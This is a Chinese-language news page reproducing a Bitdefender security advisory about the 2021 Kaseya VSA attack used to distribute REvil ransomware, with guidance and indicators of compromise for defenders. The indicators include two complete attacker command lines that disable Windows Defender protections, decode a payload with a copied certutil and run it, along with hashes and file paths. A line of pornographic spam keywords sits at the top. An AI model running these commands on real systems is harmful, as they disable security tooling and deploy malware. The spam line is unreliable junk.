偷偷摘套内射激情视频,久久精品99国产国产精,中文字幕无线乱码人妻,中文在线中文a,性爽19p

Bitdefender安全通告:黑客使用Kaseya IT管理軟件來分發(fā)REvil勒索病毒

作者:至頂網
安全
2021年7月3日美國東部時間上午10:00,遠程IT管理軟件廠商Kaseya發(fā)布了緊急安全通告,Kaseya的VSA產品成為復雜網絡攻擊的受害者,攻擊者正在使用Kaseya來分發(fā)REvil勒索病毒。

2021 年 7 月 3 日美國東部時間上午 10:00 ,遠程IT管理軟件廠商Kaseya發(fā)布了緊急安全通告,Kaseya 的 VSA 產品成為復雜網絡攻擊的受害者,攻擊者正在使用Kaseya來分發(fā)REvil勒索病毒。

[[409321]]

Kasaya安全通告:

“我們繼續(xù)強烈建議我們的本地客戶的 VSA 服務器保持關閉狀態(tài),直至另行通知。我們還將保持 SaaS 服務器離線,直至另行通知。

我們的外部專家建議我們,遇到勒索軟件并收到攻擊者通信的客戶不應點擊任何鏈接——它們可能被武器化。”

公告原文:https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689

Bitdefender正在積極監(jiān)控和分析使用 Kaseya 發(fā)動的高級攻擊,Bitdefender迄今為止的調查結果表明,Bitdefender 解決方案可檢測并阻止攻擊中使用的命令行操作和交付的惡意payload,從而保護Bitdefender客戶免受此次復雜的攻擊。

由于這是一個不斷變化的情況,我們將在可用時使用其他信息更新這篇文章。

Bitdefender 客戶指南:

  • Kaseya 安全公告, 懇請其客戶立即關閉本地 VSA 服務器。我們建議任何 Kaseya VSA 用戶立即遵循此指南。
  • 檢查本地和混合環(huán)境中的已知IoC指標 (IoC) - IoC 列表如下。
  • 美國網絡安全和基礎設施安全局 (CISA) 已 發(fā)布 警報 ,稱他們正在監(jiān)控有關針對 Kaseya VSA 和使用 VSA 軟件的多個 MSP 的攻擊的詳細信息。我們建議組織遵循 CISA 警報以獲取未來更新。

經過驗證的IoC指標 :

1. 從 Kaseya 代理執(zhí)行的命令行:

  1. C:\Windows\system32\cmd.exe” /c ping 127.0.0.1 -n 5825 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe 

  1. C:\WINDOWS\system32\cmd.exe /c ping 127.0.0.1 -n 3637 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\WaRCoMWorking\agent.crt c:\WaRCoMWorking\agent.exe & del /q /f c:\WaRCoMWorking\agent.crt C:\Windows\cert.exe & c:\WaRCoMWorking\agent.exe 

2. 哈希:

  • 561cffbaba71a6e8cc1cdceda990ead4,Bitdefender 在 2021 年 5 月 15 日已檢測到,檢測為 Gen:Variant.Graftor.952042。這是使用 certutil.exe 加密的主要可執(zhí)行文件 ( c:\kworking\agent.exe)
  • a47cf00aedf769d60d58bfe00c0b5421,Bitdefender 在 2021 年 5 月13 日已檢測到,檢測為 Gen:Variant.Bulz.471680。這是一個由主可執(zhí)行文件投遞并使用 MS msmpeng.exe 可執(zhí)行文件側面加載的 DLL。
  • 0293a5d21081a94a5589976b407f5675 – agent.crt 的哈希值(agent.exe 解密前的內容)。

3. 文件路徑:

  • c:\WarCoMWorking\agent.crt
  • c:\WarCoMWorking\agent.exe
  • c:\kworking\agent.exe
  • c:\kworking\agent.crt

c:\windows\msmpeng.exe(較舊的版本,容易受到 DLL 側加載的影響)。此版本被主要可執(zhí)行文件投遞,并進一步用于加載 DLL (a47cf00aedf769d60d58bfe00c0b5421)。文件版本:MsMpEng.exe,Microsoft 惡意軟件保護,4.5.0218.0

正在使用Bitdefender EDR的客戶,可以使用IOC掃描功能,在全網中地毯式搜索IOC指標:

添加黑名單規(guī)則:在黑名單區(qū)域,可以添加上述IOC的哈希,全網阻斷運行:

 

責任編輯:趙寧寧 來源: 至頂網
黑客網絡安全網絡攻擊
相關推薦

2021-07-06 14:22:50

勒索病毒

2021-07-08 15:51:26

Coop勒索軟件攻擊Kaseya

2021-09-17 13:27:09

勒索病毒

2021-07-06 13:55:32

REvil勒索軟件漏洞

2017-06-28 02:25:23

2021-07-07 10:40:49

勒索軟件攻擊贖金

2021-06-22 19:56:13

勒索病毒

2017-07-05 11:23:38

勒索病毒網絡安全企業(yè)數(shù)據(jù)

2021-08-10 11:42:45

勒索軟件網絡攻擊數(shù)據(jù)泄露

2022-01-17 12:44:15

勒索軟件REvil惡意軟件

2021-04-24 09:39:26

勒索軟件蘋果威脅泄露

2009-04-02 13:49:58

Kaseya終端管理IT服務

2021-09-10 09:54:38

勒索軟件REvil

2017-05-13 15:20:51

2021-07-05 18:50:22

供應鏈攻擊勒索軟件漏洞

2020-05-22 09:40:51

勒索軟件黑客暗網

2021-07-11 17:31:13

勒索軟件攻擊Kaseya

2021-09-14 14:55:17

REvil勒索軟件網絡攻擊

2021-10-04 19:06:12

REvil勒索軟件黑吃黑

2021-07-15 10:38:36

REvil勒索軟件黑客
點贊
收藏

51CTO技術棧公眾號